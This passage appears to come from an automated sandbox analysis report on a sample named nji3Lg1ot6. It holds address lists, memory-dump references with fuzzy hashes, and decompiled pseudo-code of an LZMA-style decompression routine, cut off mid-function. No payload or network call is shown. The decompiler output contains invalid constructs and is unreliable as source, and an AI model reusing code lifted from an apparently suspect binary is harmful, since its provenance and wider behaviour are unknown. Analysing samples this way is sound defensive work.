                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x004062ef

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                      • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
